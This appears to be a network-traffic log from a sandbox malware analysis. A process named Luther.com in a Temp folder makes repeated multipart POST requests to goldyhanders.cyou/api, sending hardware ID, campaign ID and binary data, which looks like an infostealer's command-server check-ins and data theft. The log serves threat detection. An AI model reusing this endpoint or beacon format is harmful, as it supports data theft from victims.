2025-01-12 14:29:18 UTC	1369	IN	Data Raw: 43 68 43 75 38 53 38 58 6a 62 43 78 77 53 53 4d 44 45 55 48 72 65 78 62 56 41 54 39 5a 57 74 6a 2b 50 44 48 35 70 2b 77 4f 4f 66 2b 68 4c 36 42 69 2b 49 4a 68 51 4a 68 56 54 33 74 35 53 5a 4e 4b 43 6f 67 64 52 6d 56 61 79 65 64 68 50 4e 69 75 31 41 5a 55 77 74 77 72 49 47 72 49 6a 6a 31 55 2f 55 55 61 66 79 42 31 74 31 4d 58 79 54 6c 43 59 55 4c 64 2f 78 55 52 39 62 76 41 55 68 6e 6e 69 52 2b 67 48 75 79 2b 59 57 43 6b 62 55 39 37 62 57 57 66 56 67 36 6f 4f 46 74 67 52 76 57 65 58 46 44 5a 47 38 42 61 4b 66 50 6b 49 30 6b 71 75 62 6f 49 59 4b 52 30 5a 69 5a 46 56 62 39 75 47 6f 51 46 56 6e 6c 71 6f 66 38 56 4b 65 32 44 6e 41 49 68 2b 35 55 6e 36 41 4c 38 6d 6d 46 45 6c 47 46 7a 57 31 52 30 6b 6d 49 4b 79 54 67 37 57 63 4c 64 30 32 30 5a 68 5a 62 55 5a 77 Data Ascii: ChCu8S8XjbCxwSSMDEUHrexbVAT9ZWtj+PDH5p+wOOf+hL6Bi+IJhQJhVT3t5SZNKCogdRmVayedhPNiu1AZUwtwrIGrIjj1U/UUafyB1t1MXyTlCYULd/xUR9bvAUhnniR+gHuy+YWCkbU97bWWfVg6oOFtgRvWeXFDZG8BaKfPkI0kquboIYKR0ZiZFVb9uGoQFVnlqof8VKe2DnAIh+5Un6AL8mmFElGFzW1R0kmIKyTg7WcLd020ZhZbUZw
2025-01-12 14:29:18 UTC	1369	IN	Data Raw: 36 42 72 73 6d 6c 46 55 69 55 52 65 52 31 6b 55 71 67 4d 57 41 44 55 4b 56 57 2f 68 4b 31 45 4a 34 59 75 4e 47 6b 6a 37 32 43 75 38 47 38 58 6a 62 56 53 38 5a 58 38 50 65 55 47 6e 57 69 36 55 4c 57 5a 35 52 75 6e 4c 53 53 48 31 75 39 67 75 4a 59 75 56 4b 34 41 2b 77 4b 70 45 59 59 46 46 65 79 5a 45 46 4b 75 6d 53 6f 55 78 6a 6c 56 2b 30 65 4d 45 4d 61 53 76 73 52 6f 70 38 72 78 4b 6f 42 37 6b 6c 6e 6c 63 76 47 31 66 55 32 31 46 69 31 6f 61 34 41 56 4b 57 58 62 4a 31 32 6b 4a 79 62 66 77 4e 68 6e 62 76 53 2b 4a 4b 2f 32 43 63 51 47 35 4a 47 65 58 57 55 57 66 58 78 35 38 4e 57 4a 68 57 72 44 2f 49 41 6d 38 6c 38 67 72 4e 4b 4b 39 47 34 51 71 36 4b 70 39 59 4b 52 78 63 30 74 5a 65 5a 39 2b 50 70 41 6c 53 6d 6c 69 33 65 64 64 4c 63 6d 44 6e 41 34 52 38 34 77 Data Ascii: 6BrsmlFUiUReR1kUqgMWADUKVW/hK1EJ4YuNGkj72Cu8G8XjbVS8ZX8PeUGnWi6ULWZ5RunLSSH1u9guJYuVK4A+wKpEYYFFeyZEFKumSoUxjlV+0eMEMaSvsRop8rxKoB7klnlcvG1fU21Fi1oa4AVKWXbJ12kJybfwNhnbvS+JK/2CcQG5JGeXWUWfXx58NWJhWrD/IAm8l8grNKK9G4Qq6Kp9YKRxc0tZeZ9+PpAlSmli3eddLcmDnA4R84w
2025-01-12 14:29:18 UTC	1369	IN	Data Raw: 59 49 51 57 4e 31 46 65 33 5a 45 46 4b 74 47 4d 75 41 42 59 6e 31 79 38 64 39 42 43 65 32 37 7a 44 59 70 33 36 55 66 67 42 37 51 6a 6d 6c 77 6b 41 31 72 61 32 31 42 67 6d 4d 76 71 43 55 37 57 43 66 70 59 32 32 56 6d 66 75 63 51 7a 57 2b 68 55 36 67 4e 76 57 44 44 47 43 30 65 55 4e 37 5a 56 57 58 58 67 61 51 49 55 4a 74 55 74 58 58 46 52 48 68 6f 2f 67 6d 47 59 75 39 48 37 41 61 31 4b 4a 42 53 62 6c 38 5a 31 73 6b 64 4d 70 69 77 70 77 46 57 6c 55 66 36 59 4a 6c 56 4e 6d 4c 35 52 74 55 77 34 30 54 6f 42 62 30 73 6b 46 41 76 48 56 66 57 31 46 52 69 30 4a 65 72 43 6c 36 58 58 37 56 2b 30 30 6c 7a 59 66 49 43 69 33 2b 76 42 4b 67 4e 71 57 44 44 47 41 45 32 62 4a 50 77 5a 79 72 48 79 37 4e 4f 55 5a 6f 52 34 6a 2f 62 54 33 70 74 2b 67 43 45 66 4f 56 44 34 77 61 Data Ascii: YIQWN1Fe3ZEFKtGMuABYn1y8d9BCe27zDYp36UfgB7QjmlwkA1ra21BgmMvqCU7WCfpY22VmfucQzW+hU6gNvWDDGC0eUN7ZVWXXgaQIUJtUtXXFRHho/gmGYu9H7Aa1KJBSbl8Z1skdMpiwpwFWlUf6YJlVNmL5RtUw40ToBb0skFAvHVfW1FRi0JerCl6XX7V+00lzYfICi3+vBKgNqWDDGAE2bJPwZyrHy7NOUZoR4j/bT3pt+gCEfOVD4wa
2025-01-12 14:29:18 UTC	1369	IN	Data Raw: 79 6f 55 56 74 44 51 57 33 6a 66 6a 4c 67 41 57 35 6c 5a 73 6e 62 57 53 48 4e 6f 38 77 71 48 63 65 68 45 35 67 4c 78 62 74 74 66 4e 6c 45 42 6b 66 42 4e 63 63 71 54 70 79 39 62 6d 52 47 6c 4d 63 34 4d 63 57 6d 31 58 73 31 35 2f 55 37 6c 47 4c 67 6e 6c 56 63 74 41 31 6a 63 32 6b 39 74 31 34 47 74 41 6c 43 5a 56 37 74 36 33 55 42 78 59 50 34 4a 67 54 43 68 43 75 38 53 38 58 6a 62 64 69 55 43 54 74 4c 66 56 6e 7a 44 78 62 56 41 54 39 5a 57 74 6a 2b 50 44 48 56 75 2f 67 4b 4e 66 4f 39 4f 35 51 71 6a 4c 35 78 66 4a 78 70 4c 32 39 5a 61 59 64 43 4f 70 51 68 45 6d 6c 2b 6f 65 73 56 65 4e 69 75 31 41 5a 55 77 74 77 72 65 44 61 45 77 6d 42 6f 66 42 31 72 48 32 6c 42 6d 6d 4a 72 6b 46 78 61 52 58 66 6f 6e 6c 30 70 35 62 50 59 4a 6a 48 6e 6a 52 2b 30 44 74 43 47 64 Data Ascii: yoUVtDQW3jfjLgAW5lZsnbWSHNo8wqHcehE5gLxbttfNlEBkfBNccqTpy9bmRGlMc4McWm1Xs15/U7lGLgnlVctA1jc2k9t14GtAlCZV7t63UBxYP4JgTChCu8S8XjbdiUCTtLfVnzDxbVAT9ZWtj+PDHVu/gKNfO9O5QqjL5xfJxpL29ZaYdCOpQhEml+oesVeNiu1AZUwtwreDaEwmBofB1rH2lBmmJrkFxaRXfonl0p5bPYJjHnjR+0DtCGd
2025-01-12 14:29:18 UTC	1369	IN	Data Raw: 76 53 79 68 31 31 6c 70 7a 71 43 56 72 57 43 66 70 38 30 45 39 33 62 2f 77 4b 67 6e 66 72 57 4f 49 4e 6f 79 47 61 55 79 4d 64 57 64 7a 63 56 32 76 52 69 4b 59 44 55 5a 46 65 76 7a 2b 5a 44 48 46 39 74 56 37 4e 55 65 4a 42 35 46 48 72 59 49 51 57 4e 31 46 65 33 5a 45 46 4b 74 69 50 72 77 52 62 6c 56 36 35 62 64 5a 4b 5a 47 58 34 44 4a 39 36 35 45 2f 6c 42 37 77 6a 6e 56 34 6c 48 55 76 59 30 56 35 68 6d 4d 76 71 43 55 37 57 43 66 70 63 77 46 70 38 59 76 6b 51 68 6e 48 73 58 4f 55 61 38 57 37 62 53 53 6b 41 47 59 6e 48 54 58 33 66 6d 75 51 58 46 70 46 64 2b 69 65 58 53 6e 39 6a 38 67 43 44 59 75 70 4d 35 77 57 34 4b 5a 39 51 4c 52 46 64 31 64 5a 59 61 64 53 4f 72 51 31 5a 6b 6c 69 30 64 74 67 4d 4f 43 58 79 48 73 30 6f 72 32 76 7a 43 62 30 74 32 30 64 67 43 Data Ascii: vSyh11lpzqCVrWCfp80E93b/wKgnfrWOINoyGaUyMdWdzcV2vRiKYDUZFevz+ZDHF9tV7NUeJB5FHrYIQWN1Fe3ZEFKtiPrwRblV65bdZKZGX4DJ965E/lB7wjnV4lHUvY0V5hmMvqCU7WCfpcwFp8YvkQhnHsXOUa8W7bSSkAGYnHTX3fmuQXFpFd+ieXSn9j8gCDYupM5wW4KZ9QLRFd1dZYadSOrQ1Zkli0dtgMOCXyHs0or2vzCb0t20dgC
2025-01-12 14:29:18 UTC	278	IN	Data Raw: 64 62 63 44 46 38 6b 35 32 6e 55 65 2f 65 4d 45 4f 51 32 62 37 43 49 70 6d 72 31 58 58 52 50 45 68 32 77 41 58 43 42 6e 48 6b 51 55 34 6c 73 57 34 54 67 37 57 46 72 6c 74 78 55 70 31 63 2f 5a 42 73 30 37 49 58 4f 49 4e 6f 53 65 4d 56 32 35 66 47 64 36 52 42 56 4f 59 6a 4b 30 56 52 34 42 63 71 6e 69 58 63 7a 67 6c 37 55 62 56 4d 4e 70 4a 35 67 53 32 4e 6f 6f 56 43 51 64 54 31 73 46 61 66 64 66 46 35 45 35 51 31 67 6e 70 4d 5a 64 49 5a 79 57 74 56 74 38 72 75 68 6d 2f 57 75 4d 2f 31 55 46 75 42 78 6d 4a 67 78 4d 71 79 73 58 79 54 68 47 56 51 36 68 35 31 46 70 31 49 73 73 34 71 6d 72 69 54 50 38 62 6a 78 36 63 51 69 4d 58 54 73 43 64 53 47 6e 57 69 36 30 59 46 74 67 52 74 54 2b 50 64 54 59 74 74 54 6e 44 4d 50 63 4b 73 45 71 45 49 35 56 57 4b 51 64 49 6e 50 Data Ascii: dbcDF8k52nUe/eMEOQ2b7CIpmr1XXRPEh2wAXCBnHkQU4lsW4Tg7WFrltxUp1c/ZBs07IXOINoSeMV25fGd6RBVOYjK0VR4BcqniXczgl7UbVMNpJ5gS2NooVCQdT1sFafdfF5E5Q1gnpMZdIZyWtVt8ruhm/WuM/1UFuBxmJgxMqysXyThGVQ6h51Fp1Iss4qmriTP8bjx6cQiMXTsCdSGnWi60YFtgRtT+PdTYttTnDMPcKsEqEI5VWKQdInP
2025-01-12 14:29:18 UTC	1369	IN	Data Raw: 33 31 65 35 0d 0a 6b 52 74 55 67 76 52 47 39 57 65 5a 77 79 55 64 67 43 42 6e 48 6b 51 55 34 6c 73 57 34 54 67 37 57 46 72 6c 74 78 55 70 31 63 2f 5a 42 73 30 37 42 54 65 34 50 74 6a 44 5a 64 69 55 46 58 70 47 66 48 57 57 59 33 5a 4e 4f 48 74 5a 75 39 44 2f 50 44 43 34 6c 77 41 57 44 66 75 68 63 2b 55 65 66 4a 35 31 64 4b 51 45 62 2f 39 70 4a 62 5a 6a 4c 36 67 67 57 7a 67 48 30 50 39 4e 64 4e 6a 32 6c 56 4e 59 6c 76 42 32 34 57 4b 35 75 67 68 67 34 55 51 47 44 6e 78 31 34 6d 4e 33 71 53 56 57 45 51 37 78 38 77 55 38 78 57 38 73 46 6d 33 33 67 51 65 6b 30 6a 77 36 57 57 53 30 66 47 2b 44 48 55 48 72 62 67 4b 30 77 61 4a 68 57 72 6e 6a 5a 53 6e 59 6c 75 30 61 43 4d 4c 64 7a 71 45 4c 78 48 39 55 59 4e 6c 45 42 6b 65 52 65 5a 4e 61 43 76 42 38 62 74 55 65 33 Data Ascii: 31e5kRtUgvRG9WeZwyUdgCBnHkQU4lsW4Tg7WFrltxUp1c/ZBs07BTe4PtjDZdiUFXpGfHWWY3ZNOHtZu9D/PDC4lwAWDfuhc+UefJ51dKQEb/9pJbZjL6ggWzgH0P9NdNj2lVNYlvB24WK5ughg4UQGDnx14mN3qSVWEQ7x8wU8xW8sFm33gQek0jw6WWS0fG+DHUHrbgK0waJhWrnjZSnYlu0aCMLdzqELxH9UYNlEBkeReZNaCvB8btUe3
2025-01-12 14:29:18 UTC	1369	IN	Data Raw: 51 6c 72 55 62 4b 63 2f 31 59 37 67 6d 6e 49 39 78 6d 45 44 5a 58 31 74 42 4c 65 74 57 4a 69 77 31 48 6e 47 2b 45 61 74 52 43 65 47 4c 6a 46 38 30 2b 72 30 57 6f 55 6f 68 67 30 78 67 52 58 78 6e 4a 6b 51 55 71 37 59 61 6b 41 46 47 41 51 50 64 59 32 55 74 33 63 2b 55 4c 67 56 48 73 57 2b 4a 4b 2f 32 43 64 47 48 5a 44 46 35 48 56 54 43 71 41 31 66 68 56 41 38 55 47 36 69 33 49 41 6d 38 6c 34 30 62 56 49 71 45 4b 2b 6b 72 70 59 4e 78 62 50 41 4e 66 30 73 64 65 4c 65 61 37 6a 78 6c 56 68 6c 65 35 51 65 6c 6e 65 6d 50 79 48 49 70 32 79 57 71 6f 52 50 45 76 32 77 41 58 55 52 47 52 37 68 4d 71 77 4d 58 79 54 6d 4f 56 58 37 52 34 77 56 30 37 51 4f 49 46 6e 58 62 73 43 71 5a 4b 74 32 44 44 43 47 42 52 58 63 43 52 42 54 71 4b 33 76 39 64 41 63 59 44 70 54 48 4f 44 Data Ascii: QlrUbKc/1Y7gmnI9xmEDZX1tBLetWJiw1HnG+EatRCeGLjF80+r0WoUohg0xgRXxnJkQUq7YakAFGAQPdY2Ut3c+ULgVHsW+JK/2CdGHZDF5HVTCqA1fhVA8UG6i3IAm8l40bVIqEK+krpYNxbPANf0sdeLea7jxlVhle5QelnemPyHIp2yWqoRPEv2wAXURGR7hMqwMXyTmOVX7R4wV07QOIFnXbsCqZKt2DDCGBRXcCRBTqK3v9dAcYDpTHOD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49733	104.21.16.1	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:19 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=87R2HP2T24FS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12800 Host: goldyhanders.cyou
2025-01-12 14:29:19 UTC	12800	OUT	Data Raw: 2d 2d 38 37 52 32 48 50 32 54 32 34 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 38 37 52 32 48 50 32 54 32 34 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 37 52 32 48 50 32 54 32 34 46 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 38 37 52 32 48 50 32 54 32 34 46 53 0d Data Ascii: --87R2HP2T24FSContent-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--87R2HP2T24FSContent-Disposition: form-data; name="pid"2--87R2HP2T24FSContent-Disposition: form-data; name="lid"jMw1IE--psyche--87R2HP2T24FS
2025-01-12 14:29:20 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 14:29:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d0r0h3s3vg5pmq1hagle0mc7bd; expires=Thu, 08 May 2025 08:15:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQr0g9xqFXfAnDgUYuPxYMTuCPBS%2BfOwsBxghq32GLb6YqgLpPxJviymBWuevS8ocs7XPhY3Q6d%2BMYXfEaq3d69iAvlIeoSbovr%2F3rIbKtnLdRNCdj5l0XMAHtb8zV9qdA9r%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900dd68ec8f90fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1469&rtt_var=626&sent=9&recv=17&lost=0&retrans=0&sent_bytes=3053&recv_bytes=13735&delivery_rate=2981620&cwnd=253&unsent_bytes=0&cid=ce93aa3677833dfd&ts=611&x=0"
2025-01-12 14:29:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-12 14:29:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49744	104.21.16.1	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:20 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=L6787UKPDE0UG5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15054 Host: goldyhanders.cyou
2025-01-12 14:29:20 UTC	15054	OUT	Data Raw: 2d 2d 4c 36 37 38 37 55 4b 50 44 45 30 55 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 4c 36 37 38 37 55 4b 50 44 45 30 55 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 36 37 38 37 55 4b 50 44 45 30 55 47 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 4c 36 37 38 37 55 4b Data Ascii: --L6787UKPDE0UG5Content-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--L6787UKPDE0UG5Content-Disposition: form-data; name="pid"2--L6787UKPDE0UG5Content-Disposition: form-data; name="lid"jMw1IE--psyche--L6787UK
2025-01-12 14:29:21 UTC	1133	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 14:29:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9qpl0b3bvemuac7itcla0vvjnu; expires=Thu, 08 May 2025 08:16:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKLuOarIzsAwsJaHhqhPZrhClClkyaVJnfOZJBB7GUkbWWXbPL%2BSP5Vbk94vHdutdBXZK3eVQqfcxdgw%2BNLYCK7TAbqY%2BPyQ2m9g2RXJvlQpLDnCNS0Wowhe35ITWYJFsf09Aw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900dd6968ee041ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1681&rtt_var=633&sent=10&recv=19&lost=0&retrans=0&sent_bytes=3053&recv_bytes=15991&delivery_rate=2605591&cwnd=193&unsent_bytes=0&cid=fa6460df662449d2&ts=617&x=0"
2025-01-12 14:29:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-12 14:29:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49750	104.21.16.1	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:22 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U1G1WYDNMWQDLV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20544 Host: goldyhanders.cyou
2025-01-12 14:29:22 UTC	15331	OUT	Data Raw: 2d 2d 55 31 47 31 57 59 44 4e 4d 57 51 44 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 55 31 47 31 57 59 44 4e 4d 57 51 44 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 31 47 31 57 59 44 4e 4d 57 51 44 4c 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 55 31 47 31 57 59 44 Data Ascii: --U1G1WYDNMWQDLVContent-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--U1G1WYDNMWQDLVContent-Disposition: form-data; name="pid"3--U1G1WYDNMWQDLVContent-Disposition: form-data; name="lid"jMw1IE--psyche--U1G1WYD
2025-01-12 14:29:22 UTC	5213	OUT	Data Raw: 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 Data Ascii: F3Wun 4F([:7s~X`nO`i
2025-01-12 14:29:23 UTC	1139	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 14:29:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=737ekb1q1hkotvfqlbvi1n268j; expires=Thu, 08 May 2025 08:16:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Msk7Kc9khTNwXaKh%2Fsjwdfp8%2FuD2JW5SdZMFmTNNjAbbLomAQ8cYsRFh6YdTpr3ISOqOYVoblO8rGy%2ByEMNUTw3iAJW6Rkady8%2BFmEa2F8di%2B3CnKhej%2B0UbJib5v7MfsSxmOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900dd69eaea74388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1568&rtt_var=643&sent=13&recv=26&lost=0&retrans=0&sent_bytes=3053&recv_bytes=21503&delivery_rate=2446927&cwnd=222&unsent_bytes=0&cid=97146bb4fc670f92&ts=718&x=0"
2025-01-12 14:29:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-12 14:29:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49761	104.21.16.1	443	7696	C:\Users\user\AppData\Local\Temp\224553\Luther.com

Timestamp	Bytes transferred	Direction	Data
2025-01-12 14:29:23 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SNQRJQPDJY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1337 Host: goldyhanders.cyou
2025-01-12 14:29:23 UTC	1337	OUT	Data Raw: 2d 2d 53 4e 51 52 4a 51 50 44 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 38 33 34 41 33 46 33 35 45 43 41 44 37 32 43 43 32 39 39 44 30 35 44 36 42 46 41 43 45 44 0d 0a 2d 2d 53 4e 51 52 4a 51 50 44 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 4e 51 52 4a 51 50 44 4a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 70 73 79 63 68 65 0d 0a 2d 2d 53 4e 51 52 4a 51 50 44 4a 59 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --SNQRJQPDJYContent-Disposition: form-data; name="hwid"C3834A3F35ECAD72CC299D05D6BFACED--SNQRJQPDJYContent-Disposition: form-data; name="pid"1--SNQRJQPDJYContent-Disposition: form-data; name="lid"jMw1IE--psyche--SNQRJQPDJYContent
2025-01-12 14:29:24 UTC	1142	IN	HTTP/1.1 200 OK Date: Sun, 12 Jan 2025 14:29:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jasg5vt2414n5q8m4a0c3n3u5m; expires=Thu, 08 May 2025 08:16:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YWYroIfk6Q%2F%2BcFM3k1C7lkMpEQxx0LCfY9Cx3sYNCke%2FsNTzXg%2BDMrm%2FY4Ns35AmtGFicshkQ9IY3WspznjICI9KMt56ycdd%2BtVLy8RO96%2BuSWOJV9AkGgE1g5rPq%2FS3j%2BR3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900dd6a86f9b41ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: 